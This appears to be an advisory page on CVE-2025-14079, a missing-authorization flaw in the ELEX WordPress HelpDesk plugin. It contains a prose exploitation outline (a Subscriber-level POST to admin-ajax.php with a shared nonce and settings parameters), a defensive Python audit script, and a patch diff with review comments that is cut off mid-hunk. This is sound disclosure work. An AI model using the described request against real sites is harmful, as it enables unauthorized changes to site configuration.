Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14079: ELEX WordPress HelpDesk & Customer Ticketing System <= 3.3.5 – Missing Authorization to Authenticated (Subscriber+) Settings Update (elex-helpdesk-customer-support-ticket-system)

Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 3.3.5
Patched Version 3.3.6
Disclosed February 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14079:
This vulnerability is a missing authorization flaw in the ELEX WordPress HelpDesk & Customer Ticketing System plugin. It allows authenticated attackers with Subscriber-level permissions or higher to modify global plugin settings. The vulnerability affects all plugin versions up to and including 3.3.5, with a CVSS score of 5.3 (Medium severity).

The root cause is the absence of a capability check in the `eh_crm_ticket_general` function in `class-crm-ajax-functions-one.php`. Before the patch, the function (at line 13) only verified the nonce with `wp_verify_nonce()` and performed no user authorization check. It then processes several POST parameters, including `default_assignee`, `default_label`, `ticket_raiser`, and `ticket_raiser_roles`, to update global WSDesk settings. Because the `wsdesk_nonce` value is shared and exposed to low-privileged users, a valid nonce proves only that the request came from the site's own pages, not that the user is allowed to change settings, which is what makes the authorization bypass possible.

Exploitation requires an authenticated attacker with at least Subscriber-level access. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `eh_crm_ticket_general`. The request must include a valid `wsdesk_nonce` value (which Subscriber users can obtain) and the settings parameters to modify. Example payload parameters include `default_assignee`, `default_label`, `ticket_raiser`, and `ticket_raiser_roles` to reconfigure global ticket handling behavior.

The patch adds capability checks to multiple AJAX handler functions across three files. In `class-crm-ajax-functions-one.php`, line 16 adds `if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) )` inside the nonce-verified branch of `eh_crm_ticket_general`, before any settings are processed, and answers a failed check with a 403 `wp_send_json_error()` response. Similar checks appear in other functions such as `eh_crm_ticket_appearance` (line 100) and `eh_crm_woocommerce_settings` (line 146), and throughout the codebase. The patch also bumps the plugin version and adds authorization checks to the reporting functions in `Reports.php`. These changes restrict sensitive operations to users with the `administrator` role or a specific custom capability.

Successful exploitation lets an attacker modify global plugin settings, including default ticket assignees, labels, ticket raiser configuration, and WooCommerce integration settings. An attacker could disrupt ticket routing, alter business logic, or degrade system functionality. While the vulnerability does not directly enable privilege escalation to WordPress administrator, it allows unauthorized configuration changes that can affect service operations and data integrity.
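As an added example (not code from the plugin or from the Atomic Edge analysis), the following Python triage script flags the pattern behind this CVE, AJAX handlers that verify `wsdesk_nonce` but never call `current_user_can()`, and runs it over constructed PHP modelled on the pre- and post-patch shape of `eh_crm_ticket_general` and `eh_crm_ticket_add_new`. It goes slightly beyond the page by also recognizing `check_ajax_referer()` as a nonce check and by reporting handlers that have neither check; the PHP samples, the `Finding` type and the function names of the script are assumptions of this example.

```python
"""Flag WordPress AJAX handlers that verify a nonce but never check a capability.

Added example for the missing-authorization pattern described above; it is not
code from the plugin or from the Atomic Edge analysis. The PHP samples below are
constructed to mirror the pre- and post-patch handlers, not copied from the plugin.
"""
import re
from dataclasses import dataclass

# Declaration style used by the plugin's handler classes.
HANDLER_RE = re.compile(r"public\s+static\s+function\s+(\w+)\s*\(")
# Either call proves the request carried a valid nonce; neither proves authorization.
NONCE_CALLS = ("wp_verify_nonce", "check_ajax_referer")
CAPABILITY_CALL = "current_user_can"


@dataclass(frozen=True)
class Finding:
    name: str
    has_nonce: bool
    has_capability: bool


def _function_bodies(php: str):
    """Yield (name, body) for each `public static function`, found by brace matching.
    Heuristic: a brace inside a PHP string literal would skew the count (fine for triage)."""
    for match in HANDLER_RE.finditer(php):
        start = php.find("{", match.end())
        if start < 0:
            continue
        depth = 0
        for pos in range(start, len(php)):
            if php[pos] == "{":
                depth += 1
            elif php[pos] == "}":
                depth -= 1
                if depth == 0:
                    yield match.group(1), php[start:pos + 1]
                    break


def audit(php: str) -> list[Finding]:
    """Classify every handler by whether it checks a nonce and a capability."""
    return [
        Finding(name, any(c in body for c in NONCE_CALLS), CAPABILITY_CALL in body)
        for name, body in _function_bodies(php)
    ]


def nonce_only_handlers(php: str) -> list[str]:
    """Handlers in the CVE-2025-14079 shape: nonce verified, no capability check.
    A nonce shared with every logged-in user says nothing about what that user may do."""
    return [f.name for f in audit(php) if f.has_nonce and not f.has_capability]


def unguarded_handlers(php: str) -> list[str]:
    """Handlers with neither check (the pre-patch eh_crm_ticket_add_new shape)."""
    return [f.name for f in audit(php) if not f.has_nonce and not f.has_capability]


# Constructed PHP modelled on the pre-patch handlers (not the plugin's code).
VULNERABLE_PHP = r"""
class Constructed_Ajax_Functions {
    public static function eh_crm_ticket_general() {
        if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
            $default_assignee = isset( $_POST['default_assignee'] ) ? sanitize_text_field( $_POST['default_assignee'] ) : '';
        }
    }
    public static function eh_crm_ticket_add_new() {
        ob_start();
    }
    public static function eh_crm_ticket_reply_agent() {
        if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
            if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'reply_tickets' ) ) {
                wp_send_json_error( array( 'message' => 'denied' ), 403 );
            }
        }
    }
}
"""

# The same handlers guarded in the style of the 3.3.6 patch (constructed).
PATCHED_PHP = VULNERABLE_PHP.replace(
    "            $default_assignee",
    "            if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {\n"
    "                wp_send_json_error( array( 'message' => 'denied' ), 403 );\n"
    "            }\n"
    "            $default_assignee",
).replace(
    "        ob_start();",
    "        check_ajax_referer( 'wsdesk_nonce', 'nonce' );\n"
    "        if ( ! current_user_can( 'manage_tickets' ) ) {\n"
    "            wp_send_json_error( array( 'message' => 'denied' ), 403 );\n"
    "        }\n"
    "        ob_start();",
)

if __name__ == "__main__":
    print(nonce_only_handlers(VULNERABLE_PHP), unguarded_handlers(VULNERABLE_PHP), nonce_only_handlers(PATCHED_PHP))
```

Pointed at a real handler file instead of the constructed sample, the script is a first-pass list of endpoints to review by hand; a body that delegates its check to a helper function will show up as a false positive.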

Differential between vulnerable and patched code

Code Diff
--- a/elex-helpdesk-customer-support-ticket-system/elex-helpdesk-customer-support-ticket-system.php
+++ b/elex-helpdesk-customer-support-ticket-system/elex-helpdesk-customer-support-ticket-system.php
@@ -3,7 +3,7 @@
  * Plugin Name: ELEX HelpDesk & Customer Support Ticket System
  * Plugin URI: https://elextensions.com/plugin/wsdesk-wordpress-helpdesk-plugin-free-version/
  * Description: Enhances your customer service and enables efficient handling of customer issues.
- * Version: 3.3.5
+ * Version: 3.3.6
  * Author: ELEXtensions
  * Author URI: https://elextensions.com/
  * Text Domain: wsdesk
--- a/elex-helpdesk-customer-support-ticket-system/includes/Tickets/Reports.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/Tickets/Reports.php
@@ -28,42 +28,63 @@
 	}

 	public function avg_time_taken_to_resolve() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getAvgResolveTime( $_REQUEST );

 		Response::json( $data );
 	}

 	public function wsdesk_no_of_tickets_per_agent_per_day() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getCountByAgentsPerDay( $_REQUEST );

 		Response::json( $data );
 	}

 	public function wsdesk_no_of_replies_by_agent_per_day() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getReplyCountByAgentsPerDay( $_REQUEST );

 		Response::json( $data );
 	}

 	public function no_of_tickets_per_status() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getCountByStatus( $_REQUEST );

 		Response::json( $data );
 	}

 	public function no_of_tickets_per_tag() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getCountByTag( $_REQUEST );

 		Response::json( $data );
 	}

 	public function statisfication_score() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->satisficationScore( $_REQUEST );

 		Response::json( $data );
 	}

 	public function avg_reply_time() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getAvgReplyTimeByAgents( $_REQUEST );

 		Response::json( $data );
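Review bot: the same four-line guard is pasted into all seven report methods in this hunk; a single private helper that wraps the `current_user_can( 'administrator' ) && current_user_can( 'manage_tickets' )` test and the `wp_send_json_error( ..., 403 )` response would keep the capability list from drifting between methods. Note also that every method hands raw `$_REQUEST` to the repository with no nonce check visible in the hunk, so the new capability test is the only guard on these endpoints, and that WordPress discourages passing a role name such as `'administrator'` to `current_user_can()` in favour of a capability.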
--- a/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-one.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-one.php
@@ -13,6 +13,9 @@
 	public static function eh_crm_ticket_general() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$default_assignee                = isset( $_POST['default_assignee'] ) ? sanitize_text_field( $_POST['default_assignee'] ) : '';
 			$default_label                   = isset( $_POST['default_label'] ) ? sanitize_text_field( $_POST['default_label'] ) : '';
 			$ticket_raiser                   = isset( $_POST['ticket_raiser'] ) ? sanitize_text_field( $_POST['ticket_raiser'] ) : '';
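Review bot: the new capability check sits inside the nonce branch, so a request with a missing or stale nonce still falls off the end of `eh_crm_ticket_general()` with no response at all (the nonce `if` has no `else`), while an unprivileged request with a valid nonce now gets a 403. Consider returning an explicit error on nonce failure, as `class-crm-ajax-functions-two.php` does later in this patch with `wp_send_json_error(['message' => 'Invalid nonce.'], 400)`, so both failure modes are observable to the caller and in logs.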
@@ -94,7 +97,9 @@
 	public static function eh_crm_ticket_appearance() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$input_width                      = isset( $_POST['input_width'] ) ? sanitize_text_field( $_POST['input_width'] ) : '';
 			$main_ticket_title                = isset( $_POST['main_ticket_title'] ) ? sanitize_text_field( $_POST['main_ticket_title'] ) : '';
 			$new_ticket_title                 = isset( $_POST['new_ticket_title'] ) ? sanitize_text_field( $_POST['new_ticket_title'] ) : '';
@@ -139,6 +144,9 @@

 	public static function eh_crm_woocommerce_settings() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$woo_order_tickets = isset( $_POST['woo_order_tickets'] ) ? sanitize_text_field( $_POST['woo_order_tickets'] ) : '';
 			$woo_order_price   = isset( $_POST['woo_order_price'] ) ? sanitize_text_field( $_POST['woo_order_price'] ) : '';
 			$woo_order_access  = explode( ',', isset( $_POST['woo_order_access'] ) ? sanitize_text_field( $_POST['woo_order_access'] ) : '' );
@@ -163,7 +171,9 @@
 	public static function eh_crm_ticket_field_delete() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$fields_remove          = isset( $_POST['fields_remove'] ) ? sanitize_text_field( $_POST['fields_remove'] ) : '';
 			$all_ticket_field_views = eh_crm_get_settingsmeta( '0', 'all_ticket_page_columns' );

@@ -207,7 +217,9 @@
 	public static function eh_crm_ticket_field_activate_deactivate() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$field_id        = isset( $_POST['field_id'] ) ? sanitize_text_field( $_POST['field_id'] ) : '';
 			$type            = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : '';
 			$selected_fields = eh_crm_get_settingsmeta( '0', 'selected_fields' );
@@ -255,7 +267,9 @@
 	public static function eh_crm_ticket_field() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$selected_fields = explode( ',', isset( $_POST['selected_fields'] ) ? sanitize_text_field( $_POST['selected_fields'] ) : '' );
 			$new_field       = json_decode( stripslashes( isset( $_POST['new_field'] ) ? sanitize_text_field( $_POST['new_field'] ) : '' ), true );
 			if ( ! empty( $new_field ) ) {
@@ -667,7 +681,9 @@
 	public static function eh_crm_ticket_field_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$field      = isset( $_POST['field'] ) ? sanitize_text_field( $_POST['field'] ) : '';
 			$args       = array(
 				'slug' => $field,
@@ -927,7 +943,9 @@
 	public static function eh_crm_ticket_label_delete() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$label_remove = isset( $_POST['label_remove'] ) ? sanitize_text_field( $_POST['label_remove'] ) : '';
 			$args         = array( 'type' => 'label' );
 			$fields       = array( 'settings_id', 'slug' );
@@ -960,7 +978,9 @@
 	public static function eh_crm_ticket_label() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_label  = json_decode( stripslashes( isset( $_POST['new_label'] ) ? sanitize_text_field( $_POST['new_label'] ) : '' ), true );
 			$edit_label = json_decode( stripslashes( isset( $_POST['edit_label'] ) ? sanitize_text_field( $_POST['edit_label'] ) : '' ), true );
 			if ( ! empty( $new_label ) ) {
@@ -1015,7 +1035,9 @@
 	public static function eh_crm_ticket_label_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$label      = isset( $_POST['label'] ) ? sanitize_text_field( $_POST['label'] ) : '';
 			$args       = array(
 				'slug' => $label,
@@ -1051,7 +1073,9 @@
 	public static function eh_crm_ticket_tag_delete() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$tag_remove = isset( $_POST['tag_remove'] ) ? sanitize_text_field( $_POST['tag_remove'] ) : '';
 			$args       = array( 'type' => 'tag' );
 			$fields     = array( 'settings_id', 'slug' );
@@ -1079,7 +1103,9 @@
 	public static function eh_crm_ticket_tag() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_tag  = json_decode( stripslashes( isset( $_POST['new_tag'] ) ? sanitize_text_field( $_POST['new_tag'] ) : '' ), true );
 			$edit_tag = json_decode( stripslashes( isset( $_POST['edit_tag'] ) ? sanitize_text_field( $_POST['edit_tag'] ) : '' ), true );
 			if ( ! empty( $new_tag ) ) {
@@ -1132,8 +1158,10 @@
 	public static function eh_crm_ticket_tag_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
-			$tag      = isset( $_POST['tag'] ) ? sanitize_text_field( $_POST['tag'] ) : '';
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
+			$tag        = isset( $_POST['tag'] ) ? sanitize_text_field( $_POST['tag'] ) : '';
 			$args     = array(
 				'slug' => $tag,
 				'type' => 'tag',
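Review bot: the `$tag` assignment is re-aligned to a wider column in this hunk while the following `$args     =` line keeps its old alignment, leaving the block misaligned; either leave the `$tag` line untouched (the only intended change is the inserted guard) or realign `$args` with it.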
@@ -1187,7 +1215,9 @@
 	public static function eh_crm_ticket_view() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$selected_views = explode( ',', isset( $_POST['selected_views'] ) ? sanitize_text_field( $_POST['selected_views'] ) : '' );
 			$new_view       = json_decode( stripslashes( isset( $_POST['new_view'] ) ? sanitize_text_field( $_POST['new_view'] ) : '' ), true );
 			$edit_view      = json_decode( stripslashes( isset( $_POST['edit_view'] ) ? sanitize_text_field( $_POST['edit_view'] ) : '' ), true );
@@ -1250,7 +1280,9 @@
 	public static function eh_crm_ticket_view_activate_deactivate() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$view_id        = isset( $_POST['view_id'] ) ? sanitize_text_field( $_POST['view_id'] ) : '';
 			$type           = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : '';
 			$selected_views = eh_crm_get_settingsmeta( '0', 'selected_views' );
@@ -1285,7 +1317,9 @@
 	public static function eh_crm_ticket_view_delete() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$view_remove    = isset( $_POST['view_remove'] ) ? sanitize_text_field( $_POST['view_remove'] ) : '';
 			$args           = array( 'type' => 'view' );
 			$fields         = array( 'settings_id', 'slug' );
@@ -1311,7 +1345,9 @@
 	public static function eh_crm_ticket_view_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$view      = isset( $_POST['view'] ) ? sanitize_text_field( $_POST['view'] ) : '';
 			$view_sett = eh_crm_get_settings(
 				array(
@@ -1457,7 +1493,9 @@
 	public static function eh_crm_ticket_trigger_activate_deactivate() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$trigger_id        = isset( $_POST['trigger_id'] ) ? sanitize_text_field( $_POST['trigger_id'] ) : '';
 			$type              = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : '';
 			$selected_triggers = eh_crm_get_settingsmeta( '0', 'selected_triggers' );
@@ -1491,7 +1529,9 @@
 	public static function eh_crm_trigger() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_trigger  = isset( $_POST['new_trigger'] ) ? wp_kses_post( $_POST['new_trigger'] ) : '';
 			$new_trigger  = json_decode( stripslashes( $new_trigger ), true );
 			$edit_trigger = json_decode( stripslashes( isset( $_POST['edit_trigger'] ) ? wp_kses_post( $_POST['edit_trigger'] ) : '' ), true );
@@ -1602,6 +1642,9 @@

 	public static function eh_crm_ticket_trigger_delete() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$trigger_remove    = isset( $_POST['trigger_remove'] ) ? sanitize_text_field( $_POST['trigger_remove'] ) : '';
 			$args              = array( 'type' => 'trigger' );
 			$fields            = array( 'settings_id', 'slug' );
@@ -1630,7 +1673,9 @@
 	public static function eh_crm_trigger_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 		$trigger      = isset( $_POST['trigger'] ) ? sanitize_text_field( $_POST['trigger'] ) : '';
 		$trigger_sett = eh_crm_get_settings(
 			array(
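Review bot: the inserted guard is indented one level deeper than the `$trigger` and `$trigger_sett` lines that follow it inside the same `if` block, which suggests the existing body of `eh_crm_trigger_edit()` was never indented into the branch; matching the surrounding indentation, or fixing it in the same change, would make the block's scope readable.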
@@ -2272,13 +2317,10 @@

 	public static function eh_crm_agent_add_user() {

-		$current_user = wp_get_current_user();
-		$user_roles   = $current_user->roles;
-
-		if ( ! in_array( 'administrator', $user_roles, true ) && ! in_array( 'WSDesk_Agents', $user_roles, true ) && ! in_array( 'WSDesk_Supervisor', $user_roles, true ) ) {
-			wp_send_json_error( array( 'message' => 'Unauthorized User.' ), 403 );
-		}
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'agents_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}

 			$role = isset( $_POST['role'] ) ? sanitize_text_field( $_POST['role'] ) : '';
 			switch ( $role ) {
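Review bot: this hunk replaces a role-array check (`administrator`, `WSDesk_Agents`, `WSDesk_Supervisor`) that ran before nonce verification with a `current_user_can( 'agents_page' )` test that runs only inside the nonce branch. Please confirm that the `WSDesk_Agents` and `WSDesk_Supervisor` roles are actually granted the `agents_page` capability, otherwise agents and supervisors who could add users in 3.3.5 lose that ability in 3.3.6; and note that a request failing the nonce check now ends silently, since the `if` has no `else`.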
@@ -2393,14 +2435,10 @@

 	public static function eh_crm_agent_add() {

-		$current_user = wp_get_current_user();
-		$user_roles   = $current_user->roles;
-
-		if ( ! in_array( 'administrator', $user_roles, true ) && ! in_array( 'WSDesk_Agents', $user_roles, true ) && ! in_array( 'WSDesk_Supervisor', $user_roles, true ) ) {
-			wp_send_json_error( array( 'message' => 'Unauthorized User.' ), 403 );
-		}
-
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'agents_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}

 			$users  = explode( ',', isset( $_POST['users'] ) ? sanitize_text_field( $_POST['users'] ) : '' );
 			$role   = isset( $_POST['role'] ) ? sanitize_text_field( $_POST['role'] ) : '';
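Review bot: same concern as in `eh_crm_agent_add_user()` above: the removed check accepted the `WSDesk_Agents` and `WSDesk_Supervisor` roles explicitly, and the new `agents_page` capability test is only equivalent if both roles carry that capability, so the role definitions should be checked (or the capability granted in the version upgrade) before this ships.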
@@ -2480,6 +2518,9 @@
 	public static function eh_crm_edit_agent_html() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'agents_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}

 			$user_id          = isset( $_POST['user_id'] ) ? sanitize_text_field( $_POST['user_id'] ) : '';
 			$user             = new WP_User( $user_id );
--- a/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-three.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-three.php
@@ -1194,6 +1194,9 @@

 	public static function eh_crm_ticket_reply_agent() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'reply_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$title      = ( isset( $_POST['ticket_title'] ) ? stripslashes( sanitize_text_field( $_POST['ticket_title'] ) ) : '' );
 			$pagination = json_decode( stripslashes( isset( $_POST['pagination_id'] ) ? sanitize_text_field( $_POST['pagination_id'] ) : null ), true );
 			$ticket_id  = isset( $_POST['ticket_id'] ) ? sanitize_text_field( $_POST['ticket_id'] ) : null;
@@ -1535,6 +1538,9 @@

 	public static function eh_crm_ticket_single_ticket_action() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$ticket_id  = isset( $_POST['ticket_id'] ) ? sanitize_text_field( $_POST['ticket_id'] ) : null;
 			$label      = isset( $_POST['label'] ) ? sanitize_text_field( $_POST['label'] ) : null;
 			$pagination = json_decode( stripslashes( isset( $_POST['pagination_id'] ) ? sanitize_text_field( $_POST['pagination_id'] ) : null ), true );
@@ -1547,6 +1553,9 @@

 	public static function eh_crm_ticket_single_ticket_assignee() {
